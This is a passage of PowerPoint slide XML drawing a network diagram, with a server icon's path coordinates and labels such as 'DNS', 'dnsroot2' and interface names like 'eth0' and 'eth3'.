                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="17688"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1994" y="19729"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1994" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="19729"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1495" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5982" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="18539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="18539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="7311" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7975" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7975" y="8334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7311" y="8334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7311" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="7145" y="9865"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8142" y="9865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8142" y="10715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7145" y="10715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7145" y="9865"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="8972" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="12462" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8972" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8972" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="13625" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="20271" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20271" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13625" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13625" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="18609" y="6463"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="20437" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20437" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18609" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18609" y="6463"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="F5F1F1"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="969696"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9241" name="WordArt 173">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFA3D08A-41D1-1D5A-ACEF-4F45405B4D07}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10714425" y="4391396"/>
              <a:ext cx="278148" cy="107828"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" fromWordArt="1">
              <a:prstTxWarp prst="textPlain">
                <a:avLst>
                  <a:gd name="adj" fmla="val 50000"/>
                </a:avLst>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-GB" sz="3600" kern="10">
                  <a:ln w="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:round/>
                    <a:headEnd/>
                    <a:tailEnd/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>DNS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9242" name="Text Box 169">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{053E9A7F-E7DC-1E4B-AD5A-87E97C9BD142}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10432210" y="4653248"/>
              <a:ext cx="907197" cy="248402"/>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50000"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0"/>
                <a:t>dnsroot2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9244" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56B90FAE-EE44-BA5F-3841-3A578BA394CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6235279" y="3210753"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9245" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BFE556A-5D32-7E1F-0216-6EECC48C5742}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9246" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2780808E-94FA-3C85-209F-F5867B56D2DA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>5</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9247" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55E560C3-C781-1F99-1902-240EDAF2208F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5539952" y="2918885"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9248" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9AAF950-30B1-2D56-5498-7BE7F349952C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9249" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98BA23CC-76E6-0E1F-6809-B1429A3BD1CA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9250" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1BE219D-93B4-C282-07DE-2ACEC821A45C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="8998383" y="2927532"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9273" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8036C2B-9C82-BC04-CAD6-371ED73F2E56}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9275" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0485BE1-BF44-8CE9-3840-9AB74138F0FA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9276" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC26A230-13B2-3FCD-9F88-3B2A00EDAB29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="9646705" y="3337921"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9277" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3F1B3AC-21E5-2D7A-2696-302D18D32B62}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
